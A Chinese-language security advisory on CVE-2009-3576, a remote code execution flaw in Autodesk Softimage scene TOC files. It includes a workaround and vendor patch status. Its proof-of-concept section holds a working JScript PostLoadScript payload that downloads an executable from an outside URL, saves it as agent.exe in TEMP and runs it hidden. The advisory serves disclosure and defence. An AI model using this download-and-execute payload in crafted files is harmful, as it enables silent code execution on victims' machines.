Autodesk SoftImage Scene TOC文件处理远程代码执行漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-12-07
Autodesk SoftImage Scene TOC文件处理远程代码执行漏洞 影响版本:
Autodesk SoftImage XSI 6.x
Autodesk SoftImage 7.x漏洞描述:
BUGTRAQ  ID: 36637
CVE ID: CVE-2009-3576

Autodesk Softimage是用于生成3D图形、3D模型和动画的图形应用程序。

Softimage默认会保持带有场景内容树的场景目录(.scntoc)文件。场景目录文件是包含有场景信息的XML文件,Softimage会查找相关的场景目录文件并应用其中的信息。用户可以编辑特制的.scntoc文件,加载了该文件后无需用户干涉就可以自动执行脚本。<*参考 
Diego Juarez
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!/-----
      <PostLoadScript>
      <Language>JScript</Language>
      <Function></Function>
      <Script_Content>
    <![cdata[
var s=new ActiveXObject(’WScript.Shell’);
var o=new ActiveXObject(’ADODB.Stream’);
var e=s.Environment(’Process’);
var u=’http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe’;
var b=e.Item(’TEMP’)+’agent.exe’;
var x=new ActiveXObject(’Microsoft.XMLHTTP’);
//x=new ActiveXObject(’MSXML2.ServerXMLHTTP’);
if(!x)
    exit(0);
x.open(’GET’,u,0);
x.send(null);
o.Type=1;
o.Mode=3;
o.Open();
o.Write(x.responseBody);
o.SaveToFile(b,2);
s.Run(b,0);
    ]] >
  </Script_Content>
  </PostLoadScript>

- -----/SEBUG安全建议:
临时解决方法:

* 通过以下步骤禁止自动读取SCTOC脚本:

   . 找到File > Preferences > Data Management > Files标签
   . 清除Read scene TOC (Table of Contents) file on load复选框

厂商补丁:

Autodesk
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://usa.autodesk.com/adsk/servlet/home?siteID=123112&id=129446